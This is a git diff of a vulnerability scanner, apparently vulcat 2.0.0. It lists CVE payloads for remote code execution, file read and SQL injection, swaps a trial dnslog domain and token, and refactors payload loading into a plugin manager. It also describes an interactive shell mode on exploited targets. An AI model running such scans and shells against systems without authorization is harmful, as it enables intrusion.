+| nodejs-cve-2017-14849-fileread                           |  Y  | Node.js目录穿越                                                      |
+| nodejs-cve-2021-21315-rce                                |  Y  | Node.js命令执行                                                      |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| nodered-cve-2021-3223-fileread                           |  Y  | Node-RED 任意文件读取                                                |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| phpmyadmin-cve-2018-12613-fileinclude-fileread           |  -  | phpMyadmin Scripts/setup.php 反序列化                                |
+| phpmyadmin-wooyun-2016-199433-unserialize                |  Y  | phpMyadmin 4.8.1 远程文件包含                                        |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| phpunit-cve-2017-9841-rce                                |  Y  | PHPUnit 远程代码执行                                                 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| ruby-on-rails-cve-2018-3760-fileread                     |  Y  | Ruby on Rails 路径遍历                                               |
+| ruby-on-rails-cve-2019-5418-fileread                     |  Y  | Ruby on Rails 任意文件读取                                           |
+| ruby-on-rails-cve-2020-8163-rce                          |  -  | Ruby on Rails 命令执行                                               |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| showdoc-cnvd-2020-26585-fileupload                       |  -  | ShowDoc 任意文件上传                                                 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| spring-security-oauth-cve-2016-4977-rce                  |  -  | Spring Security OAuth2 远程命令执行                                  |
+| spring-data-rest-cve-2017-8046-rce                       |  -  | Spring Data Rest 远程命令执行                                        |
+| spring-data-commons-cve-2018-1273-rce                    |  Y  | Spring Data Commons 远程命令执行                                     |
+| spring-cloud-config-cve-2020-5410-fileread               |  Y  | Spring Cloud目录遍历                                                 |
+| spring-boot-cve-2021-21234-fileread                      |  Y  | Spring Boot目录遍历                                                  |
+| spring-cloud-gateway-cve-2022-22947-rce                  |  -  | Spring Cloud Gateway SpEl远程代码执行                                |
+| spring-cloud-function-cve-2022-22963-rce                 |  Y  | Spring Cloud Function SpEL远程代码执行                               |
+| spring-cve-2022-22965-rce                                |  -  | Spring Framework远程代码执行                                         |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| supervisor-cve-2017-11610-rce                            |  -  | Supervisor 远程命令执行                                              |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| thinkphp-cve-2018-1002015-rce                            |  Y  | ThinkPHP5.x 远程代码执行                                             |
+| thinkphp-cnvd-2018-24942-rce                             |  Y  | 未开启强制路由导致RCE                                                |
+| thinkphp-cnnvd-201901-445-rce                            |  Y  | 核心类Request远程代码执行                                            |
+| thinkphp-cnvd-2022-86535-rce                             |  -  | ThinkPHP 多语言模块命令执行                                          |
+| thinkphp-2.x-rce                                         |  -  | ThinkPHP2.x 远程代码执行                                             |
+| thinkphp-5-ids-sqlinject                                 |  -  | ThinkPHP5 ids参数SQL注入                                             |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| ueditor-ssrf                                             |  -  | Ueditor编辑器SSRF                                                    |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| uwsgiphp-cve-2018-7490-fileread                          |  Y  | uWSGI-PHP目录穿越                                                    |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| vmware-vcenter-2020-10-fileread                          |  Y  | 2020年 VMware vCenter 6.5任意文件读取                                |
+| vmware-vcenter-cve-2021-21972-fileupload-rce             |  -  | VMware vSphere Client 远程代码执行                                   |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| oracle-weblogic-cve-2014-4210-ssrf                       |  -  | Weblogic 服务端请求伪造                                              |
+| oracle-weblogic-cve-2017-10271-unserialize               |  -  | Weblogic XMLDecoder反序列化                                          |
+| oracle-weblogic-cve-2019-2725-unserialize                |  -  | Weblogic wls9_async反序列化                                          |
+| oracle-weblogic-cve-2020-14750-bypass                    |  -  | Weblogic 权限验证绕过                                                |
+| oracle-weblogic-cve-2020-14882-rce-unauth                |  Y  | Weblogic 未授权命令执行                                              |
+| oracle-weblogic-cve-2021-2109-rce                        |  -  | Weblogic LDAP 远程代码执行                                           |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| webmin-cve-2019-15107-rce                                |  Y  | Webmin Pre-Auth 远程代码执行                                         |
+| webmin-cve-2019-15642-rce                                |  Y  | Webmin 远程代码执行                                                  |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| yonyou-grp-u8-cnnvd-201610-923-sqlinject                 |  -  | 用友GRP-U8 Proxy SQL注入                                             |
+| yonyou-nc-cnvd-2021-30167-rce                            |  Y  | 用友NC BeanShell远程命令执行                                         |
+| yonyou-erp-nc-ncfindweb-fileread                         |  -  | 用友ERP-NC NCFindWeb目录遍历                                         |
+| yonyou-u8-oa-getsession-dsinfo                           |  -  | 用友U8 OA getSessionList.jsp 敏感信息泄漏                            |
+| yonyou-u8-oa-test.jsp-sqlinject                          |  -  | 用友U8 OA test.jsp SQL注入                                           |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| zabbix-cve-2016-10134-sqlinject                          |  -  | latest.php或jsrpc.php存在sql注入                                     |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+vulcat-2.0.0/2023.03.15
+112/Poc
+55/Shell
 ```
 </details>
 
@@ -236,6 +242,7 @@ vulcat-1.2.0/2023.03.01
 * [vulhub](https://github.com/vulhub/vulhub)
 * [vulfocus](https://github.com/fofapro/vulfocus)
 * [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/)
+* [Xray](github.com/chaitin/xray)
 
 ## Star History
 [![Star History Chart](https://api.star-history.com/svg?repos=CLincat/vulcat&type=Timeline)](https://star-history.com/#Ashutosh00710/github-readme-activity-graph&Timeline)
\ No newline at end of file
diff --git a/config.yaml b/config.yaml
index 649f0e0..a2c31df 100644
--- a/config.yaml
+++ b/config.yaml
@@ -7,8 +7,8 @@ ceye-token: Null
 
 # dnslog.pw的域名和token
 # 默认带有试用域名和Token, 会过期, 可以替换为自己的
-dnslog-pw-domain: ykwc2z0d.dnslog.pw
-dnslog-pw-token: cda3499b
+dnslog-pw-domain: im4v3kv9.dnslog.pw
+dnslog-pw-token: 1221dd92
 
 # 请求Header
   # 运行时指定--user-agent参数, 会覆盖config.yaml的User-Agent
@@ -18,27 +18,4 @@ headers:
   Accept: "*/*"
   Connection: "close"
 
-# 当指定-a参数为all时, 或框架指纹识别失败时, 将会使用以下框架的POC进行扫描, 可以控制开关
-applist: [
-  'airflow', 'alidruid', 'apachedruid', 'apacheunomi', 'apisix', 'appweb', 
-  'cisco', 'confluence', 
-  'discuz', 'django', 'drupal', 
-  'elasticsearch', 
-  'f5bigip', 'fastjson', 'flink', 
-  'gitea', 'gitlab', 'grafana', 'gocd', 
-  'hadoop', 'httpd', 
-  'influxdb', 
-  'jenkins', 'jetty', 'jupyter', 'joomla', 'jboss', 
-  'keycloak', 
-  'landray', 
-  'minihttpd', 'mongoexpress', 
-  'nacos', 'nexus', 'nodejs', 'nodered', 
-  'phpmyadmin', 'phpunit', 
-  'rails', 
-  'showdoc', 'skywalking', 'solr', 'spring', 'supervisor', 
-  'thinkphp', 'tomcat', 
-  'ueditor', 'uwsgiphp',
-  'weblogic', 'webmin', 
-  'yonyou', 
-  'zabbix'
-]
+payloads-path: ./payloads/
diff --git a/demo.py b/demo.py
new file mode 100644
index 0000000..91fa40b
--- /dev/null
+++ b/demo.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        pass
+    
+    def POC(self, clients):
+        pass
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/lib/api/dns.py b/lib/api/dns.py
index 82e8e4d..5264a50 100644
--- a/lib/api/dns.py
+++ b/lib/api/dns.py
@@ -13,6 +13,7 @@
 from lib.api.dnslog_cn import *
 from lib.api.dnslog_pw import *
 from lib.api.ceye_io import *
+from time import sleep
 
 class DNS():
     def __init__(self):
@@ -56,8 +57,10 @@ def domain(self, sessid):
         except:
             return 'dnslogGetError'
 
-    def result(self, md, sessid):
+    def result(self, md, sessid, waitTime=5):
         try:
+            sleep(waitTime)
+            
             if (('ceye' in self.dns_platform) and (self.ceye_domain)):
                 return self.get_ceye_result(md)
             elif (('dnslog-pw' in self.dns_platform) and (self.dnslog_pw_domain)):
diff --git a/lib/core/client.py b/lib/core/client.py
index 57a8c28..842e2a9 100644
--- a/lib/core/client.py
+++ b/lib/core/client.py
@@ -57,8 +57,8 @@ def __init__(
         self.timeout = timeout
         self.headers = headers
         self.proxies = proxies
-        self.domain = logger.get_domain(base_url)
-        self.protocol_domain = logger.get_domain(base_url, protocol=True)
+        self.domain = logger.get_domain(base_url)                           # * 域名
+        self.protocol_domain = logger.get_domain(base_url, protocol=True)   # * 协议://域名
         
         self.delay = config.get('delay')
 
@@ -111,6 +111,8 @@ def request(self, method, path, **kwargs):
                 logger.logging(vul_info, 'Error')
                 self.print_error_info(errors.get('Error'))
                 return None
+        except KeyboardInterrupt:
+            raise KeyboardInterrupt
         except:
             logger.logging('Error', 'Error')
             return None
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 3f6ca7c..121d033 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -8,65 +8,14 @@
 from lib.tool import check
 from lib.tool import timed
 from lib.report import output
+from lib.tool.thread import thread
 
 from lib.plugins.fingerprint.waf import waf
 from lib.plugins.fingerprint.webapp import webapp
 from lib.plugins.shell import shell
 
-from payloads.AlibabaDruid.main import alidruid
-from payloads.AlibabaNacos.main import nacos
-from payloads.ApacheAirflow.main import airflow
-from payloads.ApacheAPISIX.main import apisix
-from payloads.ApacheDruid.main import apachedruid
-from payloads.ApacheFlink.main import flink
-from payloads.ApacheHadoop.main import hadoop
-from payloads.ApacheHttpd.main import httpd
-# from payloads.ApacheKafka.main import kafka       # 2023/02/22 未测试准确性
-from payloads.ApacheSkyWalking.main import skywalking
-from payloads.ApacheSolr.main import solr
-from payloads.ApacheTomcat.main import tomcat
-from payloads.ApacheUnomi.main import apacheunomi
-# from payloads.ApacheStruts2 import struts2        # 2022/11/04被移除
-from payloads.AppWeb.main import appweb
-from payloads.AtlassianConfluence.main import confluence
-from payloads.Cisco.main import cisco
-from payloads.Discuz.main import discuz
-from payloads.Django.main import django
-from payloads.Drupal.main import drupal
-from payloads.ElasticSearch.main import elasticsearch
-from payloads.F5BIGIP.main import f5bigip
-from payloads.Fastjson.main import fastjson
-from payloads.Gitea.main import gitea
-from payloads.Gitlab.main import gitlab
-from payloads.GoCD.main import gocd
-from payloads.Grafana.main import grafana
-from payloads.Influxdb.main import influxdb
-from payloads.JBoss.main import jboss
-from payloads.Jenkins.main import jenkins
-from payloads.Jetty.main import jetty
-from payloads.Joomla.main import joomla
-from payloads.Jupyter.main import jupyter
-from payloads.Keycloak.main import keycloak
-# from payloads.Kindeditor.main import kindeditor        # 还未测试poc准确性
-from payloads.Landray.main import landray
-from payloads.MiniHttpd.main import minihttpd
-from payloads.MongoExpress.main import mongoexpress
-from payloads.Nexus.main import nexus
-from payloads.Nodejs.main import nodejs
-from payloads.NodeRED.main import nodered
-from payloads.phpMyadmin.main import phpmyadmin
-from payloads.phpUint.main import phpunit
-from payloads.RubyOnRails.main import rails
-from payloads.ShowDoc.main import showdoc
-from payloads.Spring.main import spring
-from payloads.Supervisor.main import supervisor
-from payloads.ThinkPHP.main import thinkphp
-from payloads.Ueditor.main import ueditor
-from payloads.uWSGIPHP.main import uwsgiphp
-from payloads.Weblogic.main import weblogic
-from payloads.Webmin.main import webmin
-from payloads.Yonyou.main import yonyou
-from payloads.Zabbix.main import zabbix
+from PluginManager import PluginManager
+from PluginManager import __ALLMODEL__
 
 from thirdparty.tqdm import tqdm
 from queue import Queue
@@ -81,9 +30,7 @@ def __init__(self):
         self.thread = config.get('thread')                                                          # * 线程数
         self.delay = config.get('delay')                                                            # * 延时
         self.url_list = config.get('url_list')                                                      # * url列表
-        self.default_apps = config.get('app_list')                                                      # * 框架列表
-        self.application = config.get('application')
-        self.vuln = config.get('vuln')                                                              # * 是否扫描单个漏洞
+        self.vulns = config.get('vulns')                                                              # * 是否扫描单个漏洞
         self.batch = config.get('batch')                                                            # * 是否启用默认选项
         self.no_waf = config.get('no_waf')                                                          # * 是否启用WAF指纹识别
         self.no_poc = config.get('no_poc')                                                          # * 是否启用WAF指纹识别
@@ -109,7 +56,7 @@ def start(self):
                 logger.info('red_ex', self.lang['core']['start']['url_error'].format(u))
                 continue
 
-            if self.shell and (not self.vuln):
+            if self.shell and (not self.vulns):
                 logger.info('yellow_ex', self.lang['core']['start']['shell'])                          # ? 提示, 使用shell之前 请先使用-a和-v参数指定一个漏洞
                 break
 
@@ -144,12 +91,10 @@ def start(self):
                         continue
 
                 # * --------------------框架指纹识别--------------------
-                self.apps = []                  # * 要扫描的框架列表
-                self.identify_apps = []         # * 成功识别出的框架列表
+                self.identify_apps = []
                 
-                if ((self.application == 'auto') and (not self.vuln)):
+                if ((not self.vulns)):
                     webapp.stop = self.stop                                                         # * 添加暂停机制
-                    
                     self.identify_apps = webapp.identify(self.client)                               # * 传递客户端client进行框架指纹识别
             else:
                 logger.info('red', self.lang['core']['start']['unable'] + u)                        # ? 提示, 无法访问当前url
@@ -172,36 +117,20 @@ def addPOC(self):
                 如果指纹识别列表有内容, 则扫描识别出的框架
                 否则使用默认的框架列表
         '''
-        try:
-            # * 生成扫描的框架列表
-            if self.identify_apps:
-                for app in self.identify_apps:
-                    self.apps.append(eval(app.lower()))                                             # todo eval将 框架字符串 转为 import导入的框架对象
-            else:
-                for app in self.default_apps:
-                    self.apps.append(eval(app.lower()))
+        # * 加载Payloads
+        logger.info('yellow_ex', self.lang['core']['start']['loadPayload'])
         
-            # * -v/--vuln 参数, 扫描单个漏洞
-            if self.vuln:
-                if len(self.apps) == 1:
-                    app = self.apps[0]                                                              # * 获取第一个框架
-                    poc = app.addscan(self.clients, self.vuln)                                      # * 获取POC线程
-                    self.queue.put(poc)                                                             # * 加入线程
-                    return
-                else:
-                    logger.info('red_ex', self.lang['core']['addpoc']['vuln_error_1'])              # ? 日志, 使用-v/--vuln参数时出现错误
-                    logger.info('reset', '', notime=True, print_end='')                             # * 重置文字颜色
-                    _exit(0)
-
-            # * 扫描多个漏洞
-            for app in self.apps:                                                                   # * 根据框架列表self.apps, 获取相应poc
-                pocs = app.addscan(self.clients)
-                for poc in pocs:                                                                    # * 将每个poc加入线程池
-                    self.queue.put(poc)
-        except NameError:
-            logger.info('red_ex', self.lang['core']['addpoc']['notfound'] + app)                    # ? 出错, 未找到该框架
-            logger.info('reset', '', notime=True, print_end='')                                     # * 重置文字颜色
-            _exit(0)
+        if (self.vulns) and ('all' not in self.vulns):
+            PluginManager.LoadAllPlugin(self.vulns)
+        else:
+            PluginManager.LoadAllPlugin(self.identify_apps)
+        
+        # * 为每个Payload添加线程
+        try:
+            for SingleModel in __ALLMODEL__:
+                plugins = SingleModel.GetPluginObject()
+                for item in plugins:
+                    self.queue.put(thread(target=item.Start, clients=self.clients))
         except:
             logger.info('red_ex', self.lang['core']['addpoc']['Error-1'])                           # ? 出错, 添加poc时出现错误
             logger.info('reset', '', notime=True, print_end='')                                     # * 重置文字颜色
@@ -214,21 +143,21 @@ def scanning(self):
         
         logger.info('yellow_ex', '', notime=True, print_end='')                                         # * 重置文字颜色
         for q in tqdm(range(queue_thread), ncols=50):                                               # * 单个url的扫描进度条
-            try:
-                for i in range(self.thread):                                                        # * 根据线程数, 每次运行相应次数的poc
+            for i in range(self.thread):                                                        # * 根据线程数, 每次运行相应次数的poc
+                try:
                     if not self.queue.empty():                                                      # * 如果线程池不为空, 开始扫描
                         t = self.queue.get()                                                        # * 从线程池取出一个poc
                         t.start()                                                                   # * 运行一个poc
                         self.thread_list.append(t)                                                  # * 往线程列表添加一个已经运行的poc
                     else:                                                                       
                         break                                                                       # * 如果线程池为空, 结束扫描
-                sleep(self.delay)                                                              # * 扫描时间间隔
-            except KeyboardInterrupt:
-                if self.stop():
-                    continue
-                else:
-                    self.queue.queue.clear()                                                        # * 清空当前url的扫描队列
-                    break                                                                           # * 停止当前url的扫描, 并扫描下一个url
+                    sleep(self.delay)                                                              # * 扫描时间间隔
+                except KeyboardInterrupt:
+                    if self.stop():
+                        continue
+                    else:
+                        self.queue.queue.clear()                                                        # * 清空当前url的扫描队列
+                        break                                                                           # * 停止当前url的扫描, 并扫描下一个url
 
     def stop(self):
         ''' # ! 功能还没完善
@@ -268,8 +197,12 @@ def end(self):
         ''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存'''
         logger.info('cyan_ex', self.lang['core']['end']['wait'])                                    # ? 日志, 等待所有线程运行完毕, 时间长短取决于timeout参数
         for t in self.thread_list:                                                                  # * 遍历线程列表
-            t.join()                                                                                # * 阻塞未完成的子线程, 等待主线程运行完毕
-            self.results.append(t.get_result())                                                     # * 添加扫描结果
+            try:
+                t.join()                                                                                # * 阻塞未完成的子线程, 等待主线程运行完毕
+                self.results.append(t.get_result())                                                     # * 添加扫描结果
+            except KeyboardInterrupt:
+                continue
+        
         output.output_info(self.results, self.lang)                                                 # * output处理扫描结果, 在命令行输出结果信息
 
         # * 保存扫描结果, .html / .json / .txt
@@ -280,7 +213,7 @@ def end(self):
         elif (self.output_file == 'txt'):
             output.output_text(self.results, self.lang)
 
-        if self.shell and self.vuln:                                                                # * 是否使用Shell
+        if self.shell and self.vulns:                                                                # * 是否使用Shell
             self.start_shell()
 
         self.endTime = timed.getTime()                                                              # * 结束时间
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 3ca8050..65c6207 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -5,6 +5,7 @@
     参数配置
 '''
 
+from PluginManager import PluginManager
 from lib.initial.language import language
 from lib.initial.load import load_yaml
 from thirdparty.requests import packages
@@ -29,6 +30,9 @@ def __init__(self, args):
 
         args.lang = language()                                          # * 语言
 
+        payloads_path = config_yaml.get('payloads-path')                # * 攻击载荷路径
+        PluginManager.SetPluginPath(payloads_path)                      # * 设置载荷路径
+
         args.url_list = []                                              # * url列表
         if args.url:
             args.url_list.append(args.url)
@@ -107,20 +111,15 @@ def __init__(self, args):
 
         if args.vuln:
             args.vuln = args.vuln.lower()
-            args.vuln = args.vuln.replace('-', '_')
-            args.vuln = args.vuln.replace('.', '_')
-
-        app_list = config_yaml.get('applist')
-
-        if args.application in ['auto', 'all']:                         # * -a参数
-            args.app_list = app_list
-        else:
-            args.app_list = args.application.split(',')
+            args.vuln = args.vuln.replace('_', '-')
+            # args.vuln = args.vuln.replace('.', '')
+            args.vulns = args.vuln.split(',')
 
         self.global_args = vars(args)                                   # * 转为字典
 
-    def get(self, arg):
-        return self.global_args[arg]
+    def get(self, arg, default=''):
+        return self.global_args.get(arg, default)
+        # return self.global_args[arg]
 
     def set(self, arg, value):
         self.global_args[arg] = value
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 7210c6b..b457721 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -77,17 +77,18 @@ def language():
             'name': 'Vulnerability list',
             'list': 'View all payload'
         },
-        'app_list_help': {
-            'title': 'Supported target types(Case insensitive)',
-            'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
-        },
+        # 'app_list_help': {
+        #     'title': 'Supported target types(Case insensitive)',
+        #     'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
+        # },
         'core': {
             'start': {
                 'start': '[INFO] Start scanning target ',
                 'unable': '[WARN] Unable to connect to ',
                 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://',
                 'no_poc': '[No-POC] Disable Vulnerability scanning',
-                'shell': 'When using --shell, specify a vulnerability with -a and -v first(e.g. -a httpd -v cve-2021-41773 -x)'
+                'shell': '[WARN] When using --shell, specify a vulnerability with -v/--vuln first(e.g. -v cve-2021-41773 --shell)',
+                'loadPayload': '[INFO] Loading payloads...',
             },
             'waf_finger': {
                 'start': '[INFO] The WAF detection for the current URL starts',
@@ -205,17 +206,18 @@ def language():
             'name': '漏洞列表',
             'list': '查看所有Payload'
         },
-        'app_list_help': {
-            'title': '支持的目标类型(-a参数, 不区分大小写)',
-            'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
-        },
+        # 'app_list_help': {
+        #     'title': '支持的目标类型(-a参数, 不区分大小写)',
+        #     'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
+        # },
         'core': {
             'start': {
                 'start': '[INFO] 开始扫描目标 ',
                 'unable': '[WARN] 无法连接到 ',
                 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头',
                 'no_poc': '[No-POC] 不进行漏洞扫描',
-                'shell': '使用--shell时请先使用-a和-v指定一个漏洞, 例如-a httpd -v cve-2021-41773 --shell'
+                'shell': '[WARN] 使用--shell时请先使用-v/--vuln指定一个漏洞, 例如-v cve-2021-41773 --shell',
+                'loadPayload': '[INFO] 正在加载Payloads...',
             },
             'waf_finger': {
                 'start': '[INFO] 对当前url进行WAF检测, 请稍等...',
@@ -279,6 +281,10 @@ def language():
 
 # * --list的中文
 lang['zh_cn']['list'] = {
+    '74cms': {
+        'v5.0.1-sqlinject': '74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入',
+        'v6.0.4-xss': '74cms v6.0.4 帮助中心搜索框XSS',
+    },
     'Alibaba Druid': '阿里巴巴Druid未授权访问',
     'Alibaba Nacos': {'CVE-2021-29441': '阿里巴巴Nacos未授权访问'},
     'Apache Airflow': {'CVE-2020-17526': 'Airflow身份验证绕过'},
@@ -332,7 +338,7 @@ def language():
     },
     'F5 BIG-IP': {
         'CVE-2020-5902': 'BIG-IP远程代码执行',
-        'CVE-2022-1388': 'BIG-IP身份认证绕过',
+        'CVE-2022-1388': 'BIG-IP身份认证绕过RCE',
     },
     'Fastjson': {
         'CNVD-2017-02833': 'Fastjson <= 1.2.24 反序列化',
@@ -413,6 +419,10 @@ def language():
     },
     'Ueditor': 'Ueditor编辑器SSRF',
     'uWSGI-PHP': 'uWSGI-PHP目录穿越',
+    'VMware': {
+        '2020-10-fileread': '2020年 VMware vCenter 6.5任意文件读取',
+        'CVE-2021-21972': 'VMware vSphere Client 远程代码执行',
+    },
     'Oracle Weblogic': {
         'CVE-2014-4210': 'Weblogic 服务端请求伪造',
         'CVE-2017-10271': 'Weblogic XMLDecoder反序列化',
@@ -441,6 +451,10 @@ def language():
 
 # * --list的英文
 lang['en_us']['list'] = {
+    '74cms': {
+        'v5.0.1-sqlinject': 'v5.0.1 AjaxPersonalController.class.php SQLinject',
+        'v6.0.4-xss': 'v6.0.4 help center search box-XSS',
+    },
     'Alibaba Druid': 'Alibaba Druid unAuthorized',
     'Alibaba Nacos': {'CVE-2021-29441': 'Alibaba Nacos unAuthorized'},
     'Apache Airflow': {'CVE-2020-17526': 'Apache Airflow Authentication bypass'},
@@ -494,7 +508,7 @@ def language():
     },
     'F5 BIG-IP': {
         'CVE-2020-5902': 'BIG-IP Remote code execution',
-        'CVE-2022-1388': 'BIG-IP Authentication bypass',
+        'CVE-2022-1388': 'BIG-IP Authentication bypass RCE',
     },
     'Fastjson': {
         'CNVD-2017-02833': 'Fastjson <= 1.2.24 deSerialization',
@@ -575,6 +589,10 @@ def language():
     },
     'Ueditor': 'Ueditor SSRF',
     'uWSGI-PHP': 'uWSGI-PHP Directory traversal',
+    'VMware': {
+        '2020-10-fileread': 'In 2020 VMware vCenter 6.5 Any file read',
+        'CVE-2021-21972': 'VMware vSphere Client RCE',
+    },
     'Oracle Weblogic': {
         'CVE-2014-4210': 'Weblogic SSRF',
         'CVE-2017-10271': 'Weblogic XMLDecoder deSerialization',
@@ -605,7 +623,7 @@ def language():
     'identify': '[+] 识别为"{}"漏洞, 进入Shell交互模式:',
     'not_shell': '[-] 没有识别到漏洞类型, 或该漏洞类型不支持Shell',
     'not_request': '[-] POC结果没有返回Request(HTTP请求数据包), 无法使用Shell',
-    'input_command': '根据漏洞类型 输入相应的内容(例如"whoami"或"/etc/passwd"): ',
+    'input_command': '根据漏洞类型 输入相应的Payload(例如whoami): ',
     'not_command': '请输入命令 (可以输入“exit”退出)',
     'faild_command': '[Faild] 使用该命令时发生错误',
     'not_search_command': '[INFO] 替换新payload失败, 没有在旧的HTTP数据包中检测到旧的payload',
@@ -620,7 +638,7 @@ def language():
     'identify': '[+] Identified as "{}" vulnerability, Enter the Shell interactive mode:',
     'not_shell': '[-] The vulnerability type is not identified, or Shell is not supported by the vulnerability type',
     'not_request': '[-] The poc result did not return the Request(HTTP Request), Unable to use Shell',
-    'input_command': 'Enter the value according to the vulnerability type(e.g. "whoami"or"/etc/passwd"): ',
+    'input_command': 'Enter the value according to the vulnerability type(e.g. whoami): ',
     'not_command': 'Please enter the command(You can enter "exit" to exit)',
     'faild_command': '[Faild] An error occurred while using the command',
     'not_search_command': '[INFO] Description Failed to replace the new payload, No old payload was detected in the old HTTP packet',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 232f258..ef24137 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -9,9 +9,10 @@
 description_t = '\t\t'            # * 中英文标题的长度不一样, 中文需要添加\t才能对齐
 
 # * ---横线长度---
-Target_len_ = '-' * 22
-Vul_id_len_ = '-' * 20
-Type_len_ = '-' * 14
+Target_len_ = '-' * 58
+# Target_len_ = '-' * 22
+# Vul_id_len_ = '-' * 20
+# Type_len_ = '-' * 14
 Shell_len_ = '-' * 5
 Description_len_ = '-' * 70
 
@@ -26,22 +27,24 @@ def list():
     shell_num = 0
     vul_list = ''
     
-    vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+    vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+    # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
 
     for vul in vul_info:
         for info in vul_info[vul]:
             vul_num += 1
             if info['shell'] in ['Y', 'M']:
                 shell_num += 1
-            vul_list += '| {}|'.format(vul.ljust(21))
-            vul_list += ' {}|'.format(info['vul_id'].ljust(19))
-            vul_list += ' {}|'.format(info['type'].ljust(13))
+            vul_list += '| {}|'.format(info['payload'].ljust(57))
+            # vul_list += ' {}|'.format(info['vul_id'].ljust(19))
+            # vul_list += ' {}|'.format(info['type'].ljust(13))
             vul_list += ' {}|'.format(info['shell'].center(4))
             vul_list += ' {}\t\t|'.format(info['description'].ljust(51))
             vul_list += '\n'
-        vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+        # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+        vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
 
-    print(color.cyan(vul_list + 'vulcat-1.2.0/2023.03.01'))    # * 2023-03-01 09:00:00
+    print(color.cyan(vul_list + 'vulcat-2.0.0/2023.03.15'))    # * 2023-03-15 09:00:00
     print(color.cyan(str(vul_num - 1) + '/Poc'))               # * 有一个是标题, 所以要-1
     print(color.cyan(str(shell_num) + '/Shell'))
     # print(vul_num)
@@ -50,433 +53,385 @@ def list():
 vul_info = {
     'Target': [
         {
-            'vul_id': 'Vuln id',
-            'type': 'Vuln Type',
+            'payload': 'Payloads',
             'shell': 'Sh ',
             'description': 'Description' + description_t
         }
     ],
+    '74cms': [
+        {
+            'payload': '74cms-v5.0.1-sqlinject',
+            'shell': '-',
+            'description': list_lang['74cms']['v5.0.1-sqlinject']
+        },
+        {
+            'payload': '74cms-v6.0.4-xss',
+            'shell': '-',
+            'description': list_lang['74cms']['v6.0.4-xss']
+        }
+    ],
     'Alibaba Druid': [
         {
-            'vul_id': '(None)',
